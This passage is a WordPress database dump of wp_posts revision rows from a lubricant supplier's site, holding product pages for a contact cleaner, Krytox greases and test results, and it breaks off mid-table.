INSERT INTO `wp_posts` VALUES (3154, 3, '2016-11-29 14:43:16', '2016-11-29 14:43:16', 'MS-530N Contact Re-Nu is a cleaning agent that restores electrical or mechanical continuity on all types of contacts. Excellent for cleaning oxides, oil, grease and dust from  contacts, switches, relays, tuners, encoders, slide wires, rheostats, distribution panels and servomechanisms. Evaporates quickly and leaves no residue. Utilizes Miller-Stephenson\'s proprietary cleaning technology non-flammable, low odor solvent blend.\n<h4><strong>ADVANTAGES:</strong></h4>\n<ul>\n 	<li>High effective cleaning agent</li>\n 	<li>Evaporates quickly</li>\n 	<li>100% Nonflammable; low odor</li>\n 	<li>Leaves no residue</li>\n 	<li>RoHS compliant</li>\n</ul>\nMS-530N Contact Re-Nu is an electrical contact cleaner that has a high cleaning efficiency Kb value, while maintaining complete compatibility with most plastics, metals and elastomers, and sensitive electronic components.\n<h3><strong> </strong><strong>PLASTIC COMPATIBILITY:</strong></h3>\n(Immersion: 15 minutes at Room Temperature)\n<table style="height: 104px;" width="532">\n<tbody>\n<tr>\n<td width="168">·         Acetal</td>\n<td width="168">·         Polyethylene</td>\n</tr>\n<tr>\n<td width="168">·         Polypropylene</td>\n<td width="168">·         Polyester, PBT, PET</td>\n</tr>\n<tr>\n<td width="168">·         PEK, PEEK</td>\n<td width="168">·         Epoxy-Phenolcs</td>\n</tr>\n<tr>\n<td width="168">·         Polyimides</td>\n<td width="168">·         Polyvinylchloride</td>\n</tr>\n<tr>\n<td width="168">·         PTFE</td>\n<td width="168">·         Liq. Crystal Polymer</td>\n</tr>\n</tbody>\n</table>\n<strong> </strong><strong>NOTE:</strong><strong>  </strong>Acrylics, ABS, and polycarbonate, if under stress, may show slight cracking or crazing damage. Test for compatibility before use.\n<h3><strong>Elastomer Capability: </strong></h3>\n(Immersion: 15 mins at Room Temperature)\n<table style="height: 173px;" width="511">\n<tbody>\n<tr>\n<td width="168">·   Butyl Rubber</td>\n<td width="168">·    Natural Rubber</td>\n</tr>\n<tr>\n<td width="168">·   Polysulfide</td>\n<td width="168">·    EPDM</td>\n</tr>\n<tr>\n<td width="168">·   Buna S</td>\n<td width="168">·    Buna N</td>\n</tr>\n<tr>\n<td width="168">·   Neoprene</td>\n<td width="168">·    Urethane</td>\n</tr>\n<tr>\n<td width="168">·   Chlorosulfonated PE</td>\n<td width="168">·    Silicone</td>\n</tr>\n<tr>\n<td width="168">·   Viton™</td>\n<td width="168"> Fluorosilicones</td>\n</tr>\n</tbody>\n</table>\n<strong> </strong><strong>NOTE:</strong> Elastomer swelling and shrinking will, in most cases, revert to within a few percent of original size after air drying. Swell, shrinkage, and extractables are strongly affected by the compounding agents, plasticizers, and curing used in the manufacture of the elastomers. Test for compatibility before use.\n<h3><strong>Metal Compatibility:</strong></h3>\n(Immersion: 2 weeks at 99°F/37°C)\n<ul>\n 	<li>Aluminum</li>\n 	<li>Copper</li>\n 	<li>Iron</li>\n 	<li>Gold</li>\n</ul>\n<strong> </strong><strong>Note:</strong><strong>  </strong>Test for compatibility before use.\n<h3>Technical Service:</h3>\nFor any tech', 'MS-530N Contact Re-Nu®', 'An economical cleaning agent that restores electrical or mechanical continuity on all types of contacts. Removes oxides, oil, grease and dust from electrical contacts, relays, encoders, slide wires, rheostats, distribution panels and switching devices. Evaporates quickly and leaves no residue. No ODC (ozone depleting chemicals). Utilizes Miller-Stephenson&#039;s proprietary cleaning technology and 100% non-flammable, low odor solvent blend.', 'inherit', 'closed', 'closed', '', '1292-autosave-v1', '', '', '2016-11-29 14:43:16', '2016-11-29 14:43:16', '', 1292, 'https://www.miller-stephenson.com/1292-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3155, 2, '2016-11-29 13:31:04', '2016-11-29 13:31:04', '', 'Krytox XHT', '', 'inherit', 'closed', 'closed', '', 'shutterstock_523282177', '', '', '2016-11-29 13:34:58', '2016-11-29 13:34:58', '', 3152, 'https://www.miller-stephenson.com/wp-content/uploads/2016/11/shutterstock_523282177.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3156, 2, '2016-11-29 13:37:15', '2016-11-29 13:37:15', '<h3>Krytox XHT-BDZ Case Study</h3>\r\nKrytox XHT-BDZ Steam Turbine Governor Control Valve Application\r\n\r\nAn American electricity generating company reduces downtime and helps improve the bottom line by switching greases.\r\n\r\nMajor U.S. Supplier to the Electric Grid Improves Performance and Saves Money\r\n\r\nA major electricity generation company located in the United States was experiencing problems with the governor control valves in its steam turbines, because the grease it was using was drying out. This problem required the utility to shut down the base load unit for repair and to re-sleeve the bearings at least four times a year. Because the base load unit provides more than 500 megawatts to the electric grid, these frequent downtimes compromised the power supply and cost the company a significant loss of revenue.\r\n\r\n<strong>The Challenge</strong><img class="wp-image-3153 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/xht-800x770.jpg" alt="xht" width="470" height="452" />\r\n\r\nThe valve configuration used by the company is unique because it is only 10 feet from the turbine rather than the standard distance of 30 feet or more. As a result, the control valves are exposed to significantly higher temperatures than a control valve typically experiences. The company needed a grease that could handle extreme high temperatures that the cam shaft bearings and fulcrum pins are exposed to on a daily basis, and\r\nnot evaporate and cause the valve to seize— like the lubricant it had been using.\r\n\r\n<strong>The Solution</strong>\r\n\r\nKrytox <a href="https://www.miller-stephenson.com/product/krytox-xht-bdz/">XHT-BDZ</a> grease easily withstood the extreme high temperatures of this application without evaporating, enabling the control valves to operate continuously. By switching from a competitor’s product to Krytox XHT-BDZ grease, the company was able to help eliminate the need for costly quarterly shutdowns, which meant improved reliability of supply to the electric grid and enhanced company revenues.\r\n\r\n<strong>Key Advantages</strong>\r\n<ul>\r\n 	<li>Using Krytox XHT-BDZ grease, the utility was able to avoid frequent shutdowns, thus improving the reliability of supply to the electric grid and enhancing the bottom line.</li>\r\n 	<li>Cam shaft bearings and fulcrum pins stay well lubricated day in and day out, despite constant exposure to extremely high temperatures—thanks to Krytox XHT-BDZ grease.</li>\r\n 	<li>Krytox XHT-BDZ grease can provide similar benefits for steam turbine governor control valves used in paper manufacturing, chemical processing, or refinery operations.</li>\r\n</ul>\r\n&nbsp;', 'Krytox XHT-BDZ Case Study', '', 'inherit', 'closed', 'closed', '', '3152-revision-v1', '', '', '2016-11-29 13:37:15', '2016-11-29 13:37:15', '', 3152, 'https://www.miller-stephenson.com/3152-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3157, 2, '2016-11-29 13:38:50', '2016-11-29 13:38:50', '<h3>Krytox XHT-BDZ Case Study</h3>\r\nKrytox XHT-BDZ Steam Turbine Governor Control Valve Application\r\n\r\nAn American electricity generating company reduces downtime and helps improve the bottom line by switching greases.\r\n\r\nMajor U.S. Supplier to the Electric Grid Improves Performance and Saves Money\r\n\r\nA major electricity generation company located in the United States was experiencing problems with the governor control valves in its steam turbines, because the grease it was using was drying out. This problem required the utility to shut down the base load unit for repair and to re-sleeve the bearings at least four times a year. Because the base load unit provides more than 500 megawatts to the electric grid, these frequent downtimes compromised the power supply and cost the company a significant loss of revenue.\r\n\r\n<strong>The Challenge</strong><img class="wp-image-3153 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/xht-800x770.jpg" alt="xht" width="470" height="452" />\r\n\r\nThe valve configuration used by the company is unique because it is only 10 feet from the turbine rather than the standard distance of 30 feet or more. As a result, the control valves are exposed to significantly higher temperatures than a control valve typically experiences. The company needed a grease that could handle extreme high temperatures that the cam shaft bearings and fulcrum pins are exposed to on a daily basis, and\r\nnot evaporate and cause the valve to seize— like the lubricant it had been using.\r\n\r\n<strong>The Solution</strong>\r\n\r\nKrytox <a href="https://www.miller-stephenson.com/product/krytox-xht-bdz/">XHT-BDZ</a> grease easily withstood the extreme high temperatures of this application without evaporating, enabling the control valves to operate continuously. By switching from a competitor’s product to Krytox XHT-BDZ grease, the company was able to help eliminate the need for costly quarterly shutdowns, which meant improved reliability of supply to the electric grid and enhanced company revenues.\r\n\r\n<strong>Key Advantages</strong>\r\n<ul>\r\n 	<li>Using Krytox XHT-BDZ grease, the utility was able to avoid frequent shutdowns, thus improving the reliability of supply to the electric grid and enhancing the bottom line.</li>\r\n 	<li>Cam shaft bearings and fulcrum pins stay well lubricated day in and day out, despite constant exposure to extremely high temperatures—thanks to Krytox XHT-BDZ grease.</li>\r\n 	<li>Krytox XHT-BDZ grease can provide similar benefits for steam turbine governor control valves used in paper manufacturing, chemical processing, or refinery operations.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n[ux_product_categories number="10" parent="0" columns="4" title="XHT" ]', 'Krytox XHT-BDZ Case Study', '', 'inherit', 'closed', 'closed', '', '3152-revision-v1', '', '', '2016-11-29 13:38:50', '2016-11-29 13:38:50', '', 3152, 'https://www.miller-stephenson.com/3152-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3158, 2, '2016-11-29 13:39:27', '2016-11-29 13:39:27', '<h3>Krytox XHT-BDZ Case Study</h3>\n<p>Krytox XHT-BDZ Steam Turbine Governor Control Valve Application</p>\n<p>An American electricity generating company reduces downtime and helps improve the bottom line by switching greases.</p>\n<p>Major U.S. Supplier to the Electric Grid Improves Performance and Saves Money</p>\n<p>A major electricity generation company located in the United States was experiencing problems with the governor control valves in its steam turbines, because the grease it was using was drying out. This problem required the utility to shut down the base load unit for repair and to re-sleeve the bearings at least four times a year. Because the base load unit provides more than 500 megawatts to the electric grid, these frequent downtimes compromised the power supply and cost the company a significant loss of revenue.</p>\n<p><strong>The Challenge</strong><img class="wp-image-3153 alignleft" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/xht-800x770.jpg" alt="xht" width="470" height="452" /></p>\n<p>The valve configuration used by the company is unique because it is only 10 feet from the turbine rather than the standard distance of 30 feet or more. As a result, the control valves are exposed to significantly higher temperatures than a control valve typically experiences. The company needed a grease that could handle extreme high temperatures that the cam shaft bearings and fulcrum pins are exposed to on a daily basis, and<br />\nnot evaporate and cause the valve to seize— like the lubricant it had been using.</p>\n<p><strong>The Solution</strong></p>\n<p>Krytox <a href="https://www.miller-stephenson.com/product/krytox-xht-bdz/">XHT-BDZ</a> grease easily withstood the extreme high temperatures of this application without evaporating, enabling the control valves to operate continuously. By switching from a competitor’s product to Krytox XHT-BDZ grease, the company was able to help eliminate the need for costly quarterly shutdowns, which meant improved reliability of supply to the electric grid and enhanced company revenues.</p>\n<p><strong>Key Advantages</strong></p>\n<ul>\n<li>Using Krytox XHT-BDZ grease, the utility was able to avoid frequent shutdowns, thus improving the reliability of supply to the electric grid and enhancing the bottom line.</li>\n<li>Cam shaft bearings and fulcrum pins stay well lubricated day in and day out, despite constant exposure to extremely high temperatures—thanks to Krytox XHT-BDZ grease.</li>\n<li>Krytox XHT-BDZ grease can provide similar benefits for steam turbine governor control valves used in paper manufacturing, chemical processing, or refinery operations.</li>\n</ul>\n<p>&nbsp;</p>\n[ux_product_categories ids="123" number="10"]', 'Krytox XHT-BDZ Case Study', '', 'inherit', 'closed', 'closed', '', '3152-revision-v1', '', '', '2016-11-29 13:39:27', '2016-11-29 13:39:27', '', 3152, 'https://www.miller-stephenson.com/3152-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3159, 2, '2016-11-29 13:41:52', '2016-11-29 13:41:52', '<h3>Krytox High-Performance Greases &amp; Oils Application Overview</h3>\r\nDiscovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n\r\nToday, of course, it’s our well-known trademark for high-performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include low-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a></td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a></td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a></td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">XP 1A series oils/XP 2A series greases</a></td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High-Temperature Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a></td>\r\n<td colspan="2">This grease is a special high-temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best a temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a></td>\r\n<td colspan="2">This grease is a special high-temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a></td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-lvp/">LVP</a></td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nRecently we have added the new FPG series to the Krytox line offering. <a href="https://www.miller-stephenson.com/krytox-fpg-028-performance-lubricant/">FPG 028</a> was designed for use in aircraft and supporting equipment. Krytox™ FPG 028 is MIL-PRF-27617 TYPE IV specified and has AFPET/PTPT approval. It is resistant to hydrocarbon fuel, liquid oxygen and a variety of other chemicals. FPG 028 operates well under severe conditions and can be used for bearings and gears, and as a lubricant for O-rings and elastomers. The other FPG product, <a href="https://www.miller-stephenson.com/krytox-fpg-182-performance-lubricant/">the FPG 182</a> was designed for clean rooms, robotics, and electronic manufacturing. FPG 182 can be used for bearings, gears, and as a lubricant for O-rings and elastomers. It offers exceptional resistance to oxygen and chemicals and prevents corrosion.\r\n\r\nTo learn more about food grade applications <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">click here.</a>\r\n\r\nFor Automotive solutions <a href="https://www.miller-stephenson.com/krytox-automotive-lubricants/">click here.</a>\r\n\r\nKrytox <a href="https://www.miller-stephenson.com/krytox-faq/">FAQ.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/mil-prf-27617-greases/">MIL PRF 27617 Greases</a>\r\n\r\n[share title=""]\r\n\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\n<span style="font-size: 75%;">These products can also be found on <a href="https://www.grainger.com/product/KRYTOX-Multipurpose-Greases-WP6806244/_/N-1181Z1z0qq26/Ntt-krytox?_=1479826888398&amp;sst=subsetTest&amp;ts_optout=true&amp;s_pp=false&amp;picUrl=//static.grainger.com/rp/s/is/image/Grainger/35RR24_AS02?$smthumb$">Grainger.</a></span>\r\n\r\n<span style="font-size: 75%;">Krytox™ is  a trademark of The Chemours Company FC, LLC.</span>\r\n\r\n&nbsp;', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2016-11-29 13:41:52', '2016-11-29 13:41:52', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3160, 2, '2016-11-29 15:16:42', '2016-11-29 15:16:42', '<h3>Krytox XP Product Information</h3>\n<p>Krytox XP products are formulated using patented soluble additives. Typical perfluoropolyether (PFPE) greases use solid additives for anti-rust, anti-wear, or extreme pressure performance. These components are mixed into the grease and held in place by the grease thickener. In the past, there were no additives available for the oil, because of the inertness of the oil and insolubility of available additives.</p>\n<p>The Krytox line offers greases and oils—with a soluble additive in the oil. The soluble additive won’t be washed away or left behind with the grease thickener. These patented additives enhance the performance of Krytox PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting, and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads.</p>\n<p>Krytox XP products are high-quality, ultra high performance, anti-friction and anti-rust lubricants. Formulated with synthetic PFPE fluids, soluble additives, and the most efficient polytetrafluoroethylene (PTFE) thickeners available, these lubricants exceed the performance requirements of most demanding applications.</p>\n<p>Krytox XP products will hold up under tremendous load conditions, preventing metal-to-metal contact and, thereby, reducing wear. The long-term anti-rust properties repel moisture, providing extra protection<br />\nagainst corrosion of metal parts and bearing surfaces. They also exhibit excellent resistance to water washout when used in wet environments.</p>\n<p>While Krytox oils are inert and non-reactive to all elastomers, plastics, and metals, the soluble additives in Krytox XP products are new and have not been tested with all materials. It is possible that some reactivity and damage could occur to some materials. Initial testing has shown no problems with Teflon™ fluoropolymer, Kalrez® perfluoroelastomer parts, Viton™ fluoroelastomer, nitrile, and silicone rubbers. There is some reactivity of the additive with copper, but less so with brass. These additives have not been tested at all temperatures, and degradation of performance could occur at elevated temperatures over a long period of time.<img class="alignnone size-full wp-image-3163" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/Krytox-XP-Comparison-Chart.jpg" alt="krytox-xp-comparison-chart" width="1388" height="560" /></p>\n<p><strong>Performance</strong></p>\n<p>Wear testing of the additive was done using standard laboratory tests to demonstrate improved performance. Four Ball Wear tests on oil with the additive compared to oil with no additive were run according to <a href="https://www.astm.org/Standards/D4172.htm">ASTM D4172</a> at 1,200 rpm, 20 kg load, 107 °C (224 °F) starting temperature, and 1 hr duration. The wear scar was measured using a microscope. This method tests the wear prevention properties of the oils.</p>\n<p style="text-align: left;">Four Ball Wear tests on grease with the additive compared to grease with a typical solid additive were run according to <a href="https://www.astm.org/Standards/D2266.htm">ASTM D2266</a> at 1,200 rpm, 20 kg load, 107 °C (224 °F) starting temperature, and 1 hr duration. Krytox XP 1A5 oil showed a reduction of 34% in wear over the same viscosity oil with no additive.</p>\n<table class=" aligncenter" width="399">\n<tbody>\n<tr>\n<td width="219">Test Oil</td>\n<td width="180">     Wear Scar Size, mm</td>\n</tr>\n<tr>\n<td>Krytox GPL 105</td>\n<td>                  0.44</td>\n</tr>\n<tr>\n<td>Krytox XP 1A5</td>\n<td>                  0.29</td>\n</tr>\n</tbody>\n</table>\n<p>The wear scar was measured using a microscope. This method tests the wear prevention properties of the greases.</p>\n<table class=" aligncenter" width="399">\n<tbody>\n<tr>\n<td width="219">Test Grease</td>\n<td width="180">     Wear Scar Size, mm</td>\n</tr>\n<tr>\n<td>Krytox GPL 225</td>\n<td>                 0.42</td>\n</tr>\n<tr>\n<td>Krytox XP 2A5</td>\n<td>                 0.34</td>\n</tr>\n</tbody>\n</table>\n<p>Krytox XP <a href="https://www.miller-stephenson.com/product/krytox-xp-2a5/">2A5</a> grease showed a reduction of 19% in wear over a current grease with the same viscosity oil and with additives to reduce wear and corrosion.</p>\n<p>Four Ball EP tests were run on grease and oil according to <a href="https://www.astm.org/Standards/D2783.htm">ASTM D2783</a> for oil and <a href="https://www.astm.org/Standards/D2596.htm">ASTM D2596</a> for grease. This method tests the extreme pressure properties of the oil or additive and its ability to carry heavy loads.</p>\n<p><img class="alignnone size-full wp-image-3164" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/krytox-xp-load-wear-index.jpg" alt="krytox-xp-load-wear-index" width="682" height="176" /></p>\n<p>Water washout of grease from a bearing was tested by <a href="https://www.astm.org/Standards/D1264.htm">ASTM D1264</a> at 79 °C (175 °F).</p>\n<table class=" aligncenter" width="399">\n<tbody>\n<tr>\n<td style="text-align: center;" width="219">Test Grease</td>\n<td style="text-align: center;" width="180">Grease Removed</td>\n</tr>\n<tr>\n<td style="text-align: center;">Krytox XP 2A5</td>\n<td style="text-align: center;">0.25%</td>\n</tr>\n</tbody>\n</table>\n<p>Pin and Vee Block tests were conducted according to <a href="https://www.astm.org/Standards/D3233.htm">ASTM D3233</a>. The test is a load to failure test that uses progressive loading on Vee blocks that squeeze a shaft rotating at 290 rpm. The test terminates when the shaft seizes and breaks a shear pin or the machine reaches its top loading of 3,000 lb on the load pressure gauge. The test pieces are submerged in oil. This method tests the extreme pressure properties of the oil or additive. These tests were run starting at room temperature.</p>\n<table class=" aligncenter" width="579">\n<tbody>\n<tr>\n<td width="219">Test Oil</td>\n<td width="180">Maximum Load Reached,                      lb</td>\n<td width="180">       Final Torque, in lb</td>\n</tr>\n<tr>\n<td>Krytox GPL 105</td>\n<td>                  3,000</td>\n<td>                    96</td>\n</tr>\n<tr>\n<td>Krytox XP 1A5</td>\n<td>                  3,000</td>\n<td>                    